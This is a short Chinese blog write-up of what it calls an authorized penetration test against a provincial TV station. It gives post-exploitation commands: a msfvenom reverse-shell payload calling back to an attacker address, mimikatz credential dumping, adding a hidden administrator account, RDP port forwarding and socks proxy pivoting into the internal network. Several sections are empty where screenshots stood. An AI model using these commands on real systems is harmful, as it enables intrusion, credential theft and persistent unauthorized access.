年前的一次授权渗透测试

作者 : laolisafe 本文共1095个字,预计阅读时间需要3分钟 发布时间: 2019-02-14 共2.32K人阅读

00×01 信息

目标:某省电视台
环境:外网
目标数量:2
当时请假了,于是没赶上,(阵容强大,内容可能会引起不适,请关闭页面)部门同事们也是No.1,秒shell了一个。


Jsp马儿,administrator权限
机器:

权限:

端口开放:

Emmmmmmm….
我也看到有445了…但打不动
进程:

内网开放3389,内网装有亚信

00×02 Msf利用

使用msfvenom生成后门,其中x.x.x.x为防火墙的出口地址。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=x.x.x.x lport=9999 -f exe > x64reservershell.exe
。。。。。。。。。
抓取密码,在meterpreter中,可以使用load mimikatz加载猕猴桃,但此次没有抓到密码,百度一顿原来mimikatz抓不到windows2012的密码。
meterpreter>load mimikatz
meterpreter>wdigest
……啥也没抓到
由于目标机器没有杀软,直接添加用户并加入administrators组
meterpreter>shell
c:\windows\temp1>net user username password /add
c:\windows\temp1>net user localgroup administrators username /add
c:\windows\temp1>exit
meterpreter>
将远程桌面端口转发至本地,供其他小伙伴进内网
meterpreter>portfwd add -l 6666 -p 3389 -r 127.0.0.1 #-l为本地端口;-p为目标服务器端口;-r为目标服务器,这里写的是127.0.0.1,即为将受控服务器的远程桌面端口转发到kali的6666端口
meterpreter>portfwd add -l 9999 -p 8000 -r 192.168.2.4 #将192.168.2.4的8000端口转发到本地的9999端口

可以使用run autoroute添加路由,或者使用socks4a代理,之后可以内网漫游。
run autoroute –h #查看帮助run autoroute -s 192.168.159.0/24 #添加到目标环境网络
run autoroute –p #查看添加的路由

msf> use auxiliary/server/socks4a
msf > set srvhost 127.0.0.1
msf > set srvport 1080
msf > run

00×03 转变策略

进服务器后,对当前c段,进行分析
查到mq apache控制台


00×04 内网碰撞



转载声明:本站文章若无特别说明,皆为原创,转载请注明来源:大老李的Blog,谢谢!^^
大老李的Blog|渗透测试论坛|红蓝对抗|大型Web安全问答社区 » 年前的一次授权渗透测试

常见问题FAQ

下载须知:
所有工具以及资源来自网络收集,所有下载,仅供学习交流。禁止利用从本站点下载的工具进行非法活动,从事危害国家网络安全等行为,请遵守相关法律规定,如有违反与本站无关。
会员的作用是什么?
本站会上线exp漏洞库与最新0day供会员下载

发表评论

提供最优质的资源集合

立即查看 了解详情